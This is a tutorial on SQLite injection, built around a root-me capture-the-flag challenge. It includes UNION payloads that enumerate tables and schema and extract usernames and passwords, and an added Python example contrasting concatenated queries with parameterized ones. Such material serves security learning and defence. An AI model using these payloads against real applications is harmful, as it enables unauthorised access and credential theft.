sqlite injection – All things in moderation

Introduction

SQLite is a small embedded SQL database engine (RDBMS) written in C. Unlike most other SQL databases, SQLite does not have a separate server process; it reads and writes directly to ordinary disk files.

Cheat Sheet

Name | Syntax
Comments |
IF Statements | CASE
Substring | substr(x,y,z)
Length | length(stuff)
Enumerate tables | SELECT tbl_name FROM sqlite_master;
Enumerate columns | SELECT sql FROM sqlite_master

Example: consider the URL

http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=12
This is a root-me.org challenge (SQL injection – numeric).

Let's check for an SQL injection vulnerability

The easiest way to discover an SQLite injection vulnerability is to append characters such as ' (single quote) or " (double quote) to the end of the URL. If the server shows an error like the one in the following picture, the web app has an SQL injection vulnerability.

Exploit SQL injection:

Get information schema:

The dot commands are available only at the SQLite prompt, so from application code you list all the tables created in your database with a SELECT statement against the sqlite_master table:

1. Enumerate tables

sqlite query:

sqlite> SELECT tbl_name FROM sqlite_master;

payload:

news_id=12 union select 1,2, tbl_name FROM sqlite_master; -- -

This will produce the following result:

Blind SQL injection

like other DBMS such as MySQL, SQLite

2. Enumerate columns

sqlite query:

sqlite> SELECT sql FROM sqlite_master;

payload:

news_id=12 union select 1,2, sql FROM sqlite_master; -- -

This will produce the following result:

Get Data

payload:

news_id=12 union select 1,username, password FROM users; -- -

This will produce the following result:
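Why the UNION payload above works against a concatenated query and returns nothing once the value is bound as a parameter, shown as an added example that is not part of the original post. The schema, sample rows and function names are assumptions; only the payload string comes from the post.

```python
import sqlite3

# Payload quoted from the post; everything else here is constructed sample data.
PAYLOAD = "12 union select 1,2, tbl_name FROM sqlite_master; -- -"

def make_db():
    # Assumed schema: three columns in news, so the 3-column UNION lines up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (12, 'Hello', 'First post');
        INSERT INTO users VALUES (1, 'admin', 'constructed-secret');
    """)
    return db

def news_vulnerable(db, news_id):
    # The request value becomes part of the SQL text, so it can add clauses.
    sql = "SELECT id, title, body FROM news WHERE id = " + news_id
    return db.execute(sql).fetchall()

def news_parameterized(db, news_id):
    # The value is bound as data; keywords inside it are never parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (news_id,)).fetchall()

def news_strict(db, news_id):
    # Reject non-integers up front, then bind the converted value.
    if not (news_id.isascii() and news_id.isdigit()):
        raise ValueError("news_id must be an integer")
    return news_parameterized(db, int(news_id))

if __name__ == "__main__":
    db = make_db()
    print("normal      :", news_vulnerable(db, "12"))
    print("concatenated:", news_vulnerable(db, PAYLOAD))
    print("bound       :", news_parameterized(db, PAYLOAD))
    try:
        news_vulnerable(db, "12'")  # the quote test described in the post
    except sqlite3.OperationalError as exc:
        # Log this server-side; returning it to the client confirms the flaw.
        print("quote probe :", type(exc).__name__)
    try:
        news_strict(db, PAYLOAD)
    except ValueError as exc:
        print("strict      :", exc)
```

The quote probe only reveals the flaw when the database error reaches the response, so the hardened handler should return a generic error page and keep the exception in server logs.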
